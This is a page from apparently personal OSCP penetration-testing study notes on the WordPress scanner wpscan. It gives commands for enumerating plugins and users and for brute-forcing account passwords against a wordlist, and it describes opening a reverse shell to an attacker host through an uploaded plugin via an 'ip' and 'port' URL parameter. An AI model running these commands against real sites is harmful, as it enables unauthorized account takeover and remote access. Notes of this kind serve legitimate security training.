Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  • enumerate plugins
  • enumerate users
  • brute force user accounts
  • Conwell-Quotes for reverse shell
  1. Menu
  2. Tools of the Trade

wpscan

PreviousredisNextcewl

Last updated 3 years ago

enumerate plugins

wpscan --update --url http://192.168.120.66/ --enumerate ap --plugins-detection aggressive

enumerate users

wpscan --url http://$_target -e u --disable-tls-checks

brute force user accounts

wpscan --url http://$_target -e u --disable-tls-checks -U users.lst -P /usr/share/wordlists/rockyou.txt

Conwell-Quotes for reverse shell

If you have access to upload a plugin, you can get reverse shell with Conwell-Quotes

error.php?ip=$LHOST&port=$LPORT

https://github.com/kylepott/Conwell-Quotes